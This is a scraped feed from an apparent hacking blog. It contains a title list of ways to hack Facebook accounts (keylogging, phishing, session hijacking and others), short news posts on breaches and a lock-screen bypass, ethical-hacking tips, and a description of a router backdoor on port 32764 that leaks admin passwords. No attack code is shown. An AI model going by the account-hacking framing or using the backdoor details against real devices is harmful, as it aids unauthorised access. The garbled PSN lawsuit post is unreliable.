<span style="color: #444444; font-family: 'Helvetica Neue', Arial, Helvetica, sans-serif; line-height: 21px;">4:</span><span style="color: #444444; font-family: 'Helvetica Neue', Arial, Helvetica, sans-serif; line-height: 21px;">Hack A Facebook Account By Exploiting Facebook's Trusted Friend Feature </span></div>
<div style="text-align: left;">
<span style="color: #444444; font-family: 'Helvetica Neue', Arial, Helvetica, sans-serif; line-height: 21px;">5:</span><span style="color: #444444; font-family: 'Helvetica Neue', Arial, Helvetica, sans-serif; line-height: 21px;">Keylogging</span></div>
<div style="text-align: left;">
<span style="color: #444444; font-family: 'Helvetica Neue', Arial, Helvetica, sans-serif; line-height: 21px;">6:</span><span style="color: #444444; font-family: 'Helvetica Neue', Arial, Helvetica, sans-serif; line-height: 21px;">Hijacking <span class="IL_AD" id="IL_AD9">Facebook Fan Pages</span> </span></div>
<div style="text-align: left;">
<span style="color: #444444; font-family: 'Helvetica Neue', Arial, Helvetica, sans-serif; line-height: 21px;">7:</span><span style="color: #444444; font-family: 'Helvetica Neue', Arial, Helvetica, sans-serif; line-height: 21px;"><span class="IL_AD" id="IL_AD5">Hack Facebook Account</span> Status - Facebook Status Vulnerability</span></div>
<div style="text-align: left;">
<span style="color: #444444; font-family: 'Helvetica Neue', Arial, Helvetica, sans-serif; line-height: 21px;">8:</span><span style="color: #444444; font-family: 'Helvetica Neue', Arial, Helvetica, sans-serif; line-height: 21px;"><span class="IL_AD" id="IL_AD7">Facebook phishing</span></span></div>
<div style="text-align: left;">
<span style="color: #444444; font-family: 'Helvetica Neue', Arial, Helvetica, sans-serif; line-height: 21px;"> 9:</span><span style="color: #444444; font-family: 'Helvetica Neue', Arial, Helvetica, sans-serif; line-height: 21px;">Stealers</span></div>
<div style="text-align: left;">
<span style="color: #444444; font-family: 'Helvetica Neue', Arial, Helvetica, sans-serif; line-height: 21px;">10:</span><span style="color: #444444; font-family: 'Helvetica Neue', Arial, Helvetica, sans-serif; line-height: 21px;">Session Hijacking</span></div>
<div style="text-align: left;">
<span style="color: #444444; font-family: 'Helvetica Neue', Arial, Helvetica, sans-serif; line-height: 21px;">11:</span><span style="color: #444444; font-family: 'Helvetica Neue', Arial, Helvetica, sans-serif; line-height: 21px;">Sidejacking With Firesheep</span></div>
<div style="text-align: left;">
<span style="color: #444444; font-family: 'Helvetica Neue', Arial, Helvetica, sans-serif; line-height: 21px;">12:</span><span style="color: #444444; font-family: 'Helvetica Neue', Arial, Helvetica, sans-serif; line-height: 21px;">DNS Spoofing</span></div>
<div style="text-align: left;">
<span style="color: #444444; font-family: 'Helvetica Neue', Arial, Helvetica, sans-serif; line-height: 21px;">13:</span><span style="color: #444444; font-family: 'Helvetica Neue', Arial, Helvetica, sans-serif; line-height: 21px;">USB Hacking </span></div>
<div style="text-align: left;">
<span style="color: #444444; font-family: 'Helvetica Neue', Arial, Helvetica, sans-serif; line-height: 21px;">14:</span><span style="color: #444444; font-family: 'Helvetica Neue', Arial, Helvetica, sans-serif; line-height: 21px;">Man In the Middle Attacks</span></div>
<div style="text-align: left;">
<span style="color: #444444; font-family: 'Helvetica Neue', Arial, Helvetica, sans-serif; line-height: 21px;">15:</span><span style="color: #444444; font-family: 'Helvetica Neue', Arial, Helvetica, sans-serif; line-height: 21px;">Botnets</span></div>
<div style="text-align: left;">
<span style="color: #444444; font-family: 'Helvetica Neue', Arial, Helvetica, sans-serif; line-height: 21px;">16:</span><span style="background-color: #ebebeb; font-family: Verdana, Arial, sans-serif; font-size: 12px; line-height: 16px; text-align: center;">Movable Mobile Hacking</span></div>
<div style="background-color: white; border: medium none; color: black; overflow: hidden; text-align: left; text-decoration: none;">
<br /></div>
</div>
Unknownnoreply@blogger.com2tag:blogger.com,1999:blog-7171379281281950124.post-68706124188710530752014-02-21T04:28:00.000-08:002014-02-21T04:28:23.405-08:00Hacking attack on KickStarter Username and password is stolen<div dir="ltr" style="text-align: left;" trbidi="on">
<div style="text-align: center;">
<img alt="KickStarter hacking attack" height="324" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjkpA7xlnjjOFfP_lua3Zi4Ohyg0zGmvBw1aF0HeKs2HXl67vrSTPRwigHPLJBGml1Uq-V-gfFVNyG1F6NwND6_BkbWfkpo-HUIF8GWxkX69yntsnfulMYWUOs80BGwXuqPbaDFo3HmoWw/s1600/cyber-attack-security-breach-ehackingnews.jpg" title="KickStarter hacked" width="640" /></div>
<br />Online Crowdfunding website KickStarter is to be the latest high-profile
website reporting security breach. KickStarter became aware of the
breach, after receiving a notification from Law enforcement.<br />
Hackers breached their website( kickstarter.com) and gained access to
the user's information including usernames, encrypted passwords, email
IDs and phone numbers. The company says there is No Credit card data
compromised in this breach. <br />
<br />
Even though the password is encrypted one, we aware the fact that
attackers with enough computing power can easily crack those passwords.<br />
<br />
The company informs
that two accounts have been accessed by hackers so far. All users are
recommended to change their password immediately for the KickStarter
website. <br />
<br />
If you are using the same password in any other websites(most of us do), you are also advised to reset the password there also.<br />
<br />
"We’re incredibly sorry that this happened. We set a very high bar for
how we serve our community, and this incident is frustrating and
upsetting." the company apologizes in their blog post.<br /><br />See more at: <a href="http://www.ehackingnews.com/2014/02/kickstarter-website-hacked.html#sthash.St3MIcdW.dpuf">http://www.ehackingnews.com/2014/02/kickstarter-website-hacked.html#sthash.St3MIcdW.dpuf</a></div>
Unknownnoreply@blogger.com2tag:blogger.com,1999:blog-7171379281281950124.post-18448598879347010732014-02-21T04:22:00.000-08:002014-02-21T04:22:30.837-08:00Ten tips of Ethical hacking<div dir="ltr" style="text-align: left;" trbidi="on">
Here are 10 tips for Ethical hacking which will surly help you alot<br /><br />
<ol>
<li> <b>Get it in writing.</b><br />
You've heard it a thousand times, but believe it or not I've seen
security professionals perform -- and security managers allow -- ethical
hacking on critical business systems without putting anything in
writing ahead of time. You've absolutely got to cover your assets and
not only get a basic sign-off by all parties involved, but also consider
and document who's responsible (or not) when something goes awry during
the testing. Bad things can happen during ethical hacking -- servers
can crash and data can get lost. Think about this from a business
perspective. You'll make your lawyer and insurance underwriter proud!
</li>
<li> <b>You've got to have goals.</b><br />
Just like with any successful business venture, you've got to determine exactly what you want to get
out of ethical hacking. What outcomes are you looking for? Is this to
prove you need to migrate to a Novell or Unix platform? Are you trying
to get more money to spend on security? Are you trying to comply with
federal regulations or meet security standards? Also, ask yourself what
information you're trying to protect and which systems need to be
tested.
</li>
<li> <b>Don't try to test everything at once.</b><br />
This doesn't necessarily apply to small networks, but who really has a <i>small</i>
network any more? Prioritize the systems that need to be tested, and
test the most critical ones first. This is most likely Web, e-mail or
database servers, and even perimeter devices such as routers and
firewalls. Look for single points of failure and systems your business
can do without. Many security professionals focus only on publicly
accessible hosts. Remember that hacking can occur from inside the
network, so don't forget about the insider threat and the systems that
could be affected by it.
</li>
<li> <b>Don't forget to test the "unimportant" systems.</b><br />
OK, so this conflicts with lesson number three. Well, not exactly. You
don't have to test all of your systems, but it does help to think
through how attacks can occur and affect other, less important systems.
Workstations that don't have confidential data on them, the
telecommuter's home PC or that Web server that only provides basic
e-mail access are often the systems that are used as stepping stones to
attack other, more critical systems. Never rule out the rogue "little
guy."
</li>
<li> <b>It sounds clichÉ, but thinking like the enemy really does help.</b><br />
On the heels of lesson number four comes the tried and true "know your enemy."
It's old-fashioned, but true. If systems are tested using only the
latest automated tools without thinking through all the other various
ways manual hacks that can be carried out, the complete picture won't be
seen. There's no way to test for every possible hack from every
possible angle. The key is making sure the research has been done and
hacker motives and methods are understood and made part of your ethical
hacking program.
</li>
<li> <b>Use the right tools.</b><br />
This is something I'm reminded of every time I perform ethical hacking
tests. I don't know what I'd do without the tools (both freeware and
commercial) I've gathered over the years. It's just like any successful
homebuilder will tell you; you've got to have the right tool for the
task at hand. Otherwise, it will likely be an exercise in futility with
bad results. As a security manager, make sure your team or the
third-party ethical hackers you've hired have the right tools. Many are
not simple to use and many are not inexpensive, but they sure are worth
it.
</li>
<li> <b>It's all in the timing.</b><br />
Ever hear of someone pounding on a system with a million packets per
minute to see if the TCP/IP stack is stable? This kind of testing might
be OK, but as my mother always told me, there's a time and a place for
everything. Make sure that the ethical hacking tests are not carried out
during peak network or host usage. You don't want the network to run
slow or have a system crash. There are a lot of security tools that can
do just that if the system is unstable or overloaded with other requests
at the time the testing is being carried out. Come up with a timeline.
And put it in writing!
</li>
<li> <b>Don't think that no penetration means you're secure.</b><br />
A very common misconception is that if no penetration was possible that
the systems must be secure. Nope! It could be that the right tools
weren't used or the right systems weren't tested. It could also be that a
vulnerability has not yet been discovered for the system you're
testing. Ethical hacking is a snapshot in time of a few specific
systems. There could be a rogue router (or user) presenting a security
problem on the other side of the world that was overlooked or not part
of the original scope. You just never saw it.
</li>
<li> <b>Keep up the good work.</b><br />
Lesson number eight is what makes number nine critical. I know you hear
about testing your systems over and over again. It's true; things
change. New threats and vulnerabilities crop up. Make sure your systems
are being tested periodically for new issues and to catch
vulnerabilities that were missed in the past. Repetition is key.
</li>
<li> <b>Focus on the important and urgent vulnerabilities</b><br />
I've seen a lot of security managers feel obligated to fix every
vulnerability discovered during the ethical hacking process. It
realistically can't be done. It's not reasonable or fair to put pressure
on yourself or your team to secure everything. Take the route that time
management experts recommend when prioritizing daily tasks: go for
vulnerabilities that are both important (high impact if exploited) and
urgent (high likelihood of being exploited). The other vulnerabilities
can then be addressed as time, resources and money allows.</li>
</ol>
If you can incorporate into your ethical hacking efforts even just a
few of these 10 lessons I've learned over the years, I know they'll make
your job as a security manager a little easier; after all, every little
bit counts.<br /><br />Read more at: <a href="http://searchsecurity.techtarget.com/tip/Ethical-hacking-Ten-crucial-lessons" target="_blank">http://searchsecurity.techtarget.com/tip/Ethical-hacking-Ten-crucial-lessons</a><br />
<br /></div>
Unknownnoreply@blogger.com2tag:blogger.com,1999:blog-7171379281281950124.post-18447271775401778752014-02-21T04:12:00.000-08:002014-02-21T04:12:59.876-08:00PSN Hacking – The law-suit is closed, Sony paid the charges<div dir="ltr" style="text-align: left;" trbidi="on">
The lawsuit that was filed against Sony for the famous hacker attacks
suffered by the NDP in 2011, or at least one of those organized in the
United States, has been closed by Judge Anthony Battaglia, Sony released
all the charges. The reason being that none of the plaintiffs in the
law-suit signed up for any premium subscription on Playstation network,
and used the services for free.<br />
<br />
<img alt="PSN Logo1 PSN Hacking The law suit is closed, Sony paid the charges" class="alignleft size-full wp-image-990" height="195" src="http://d365c80qdsc0p4.cloudfront.net/wp-content/uploads/PSN-Logo1.jpg" style="opacity: 1;" title="PSN-Logo" width="270" /><br />
In addition to receiving the free service, there is another point
that free Sony accusations: the same formulation of the cause is hereby
given that the service has been suspended for an illegal attack brought
from outside intrusion into the Network which Sony is not responsible
for. Addition to the agreement signed by the use of PSN users it is
reported that if the system is not perfect and that errors and problems
can emerge, then the person signing the agreement does so at his own
risk with regard to any failure.</div>
Unknownnoreply@blogger.com2tag:blogger.com,1999:blog-7171379281281950124.post-84114720887015423012014-02-21T04:08:00.001-08:002014-02-21T04:09:11.116-08:00Samsung Galaxy Note II Lock Screen Bypass Vulnerability<div dir="ltr" style="text-align: left;" trbidi="on">
<img alt="Galaxy Note 2 Samsung Galaxy Note II Lock Screen Bypass Vulnerability" class="size-full wp-image-997 aligncenter" src="http://d365c80qdsc0p4.cloudfront.net/wp-content/uploads/Galaxy_Note_2.png" height="386" style="opacity: 1;" title="Samsung Galaxy Note II Lock Screen Bypass Vulnerability" width="600" /><br />
<div style="text-align: left;">
If you’re an iOS user then it’s a high
probability that you’ve heard about the security flaws found in iPhone
recently. If you haven’t then you can read about it <a class="external external_icon" href="http://bgr.com/2013/02/25/apple-ios-6-1-vulnerability-343637/" rel="nofollow" target="_blank" title="iPhone Security Flaw">here</a>.</div>
<div style="text-align: left;">
This time it’s Android which is in the buzz
these days. Specifically, it’s the creative phablet Samsung Galaxy Note
II which is in the news. A Youtuber named Terence Eden recently
uploaded a video on Youtube demonstrating the security flaw in the
Samsung Galaxy Note II. The vulnerability shows how a user can bypass
the lock screen and access the apps or calls from the home screen of
Android OS. This vulnerability was demonstrated on a Note II running on
Android 4.1.2 stock OS. Though, a user can only access the homescreen
for a second or two but that timespan is enough to make a call or open
any app on the homescreen if you’re quick enough.</div>
<h2>
Galaxy Note 2 Lock Screen Bypass Vulnerability</h2>
I wonder if it’s just Galaxy Note II which
is having this vulnerability or maybe it’s the same for Galaxy lineup
running Android 4.1.2 such as a Samsung Galaxy S3. Well, my colleague
has a Galaxy S3 so I reckon that it’s time to test it out on an S3 as
well. I’ll update this post after checking that on a Galaxy S3 soon.
Till then, happy hacking<br />
<br />
Read more at:<a href="http://hackingarticles.com/samsung-galaxy-note-ii-lock-screen-bypass-vulnerability/">http://hackingarticles.com/samsung-galaxy-note-ii-lock-screen-bypass-vulnerability/</a></div>
Unknownnoreply@blogger.com5tag:blogger.com,1999:blog-7171379281281950124.post-436507443896944882014-02-21T04:05:00.002-08:002014-02-21T04:05:51.910-08:00Backdoor in Netgear Router<div dir="ltr" style="text-align: left;" trbidi="on">
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjtkR8OmvmTbinXv_spvyM4j4vZE2OkUqGe2zbFJaag9GJHHhlyb6YTjg6K0oGb21bTBkbwbR8ViDN_a-8XPto7MxU698dGQ2AzRNXhvFwxlZHNQkVobToJifTCz7PcLx6FnUb9SeGIiEc/s1600/backdoor-linksys.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img alt="router" border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjtkR8OmvmTbinXv_spvyM4j4vZE2OkUqGe2zbFJaag9GJHHhlyb6YTjg6K0oGb21bTBkbwbR8ViDN_a-8XPto7MxU698dGQ2AzRNXhvFwxlZHNQkVobToJifTCz7PcLx6FnUb9SeGIiEc/s1600/backdoor-linksys.png" height="331" title="Backdoor in Linksys" width="640" /></a></div>
<br />This news could hurt the reputation of both companies. A passionate
(and obviously very competent) reverse-engineer from France, Eloi Vanderbeken
forgot the admin interface password of his router and so he just wanted
to have fun accessing the administration side and that’s when he
discovered a backdoor in his <strong>Linksys WAG200G</strong> router. After publishing this discovery on Github, other users have confirmed its existence in at least three other routers:<br />
<ul>
<li>Netgear DM111Pv2</li>
<li>Linksys WAG320N</li>
<li>Linksys WAG54G2</li>
</ul>
Other routers are suspected of providing equal opportunity to obtain the administrator password through the <strong>32764 port</strong>, but it has not yet been confirmed:<br />
<ul>
<li>Netgear DG934</li>
<li>Netgear DG834</li>
<li>Netgear WPNT834</li>
<li>Netgear DG834G</li>
<li>Netgear WG602</li>
<li>Netgear WGR614</li>
<li>Netgear DGN2000</li>
<li>Linksys WAG120N</li>
<li>Linksys WAG160N</li>
<li>Linksys WRVS4400N</li>
</ul>
The backdoor listens for communications sent to <strong>port 32764</strong>
specifically and answers a series of 13 numbered commands that can be
ordered by sending a specific message. It is therefore possible to
obtain the complete remote configuration of the router, the
administrator password or even restore default settings.</div>
Unknownnoreply@blogger.com1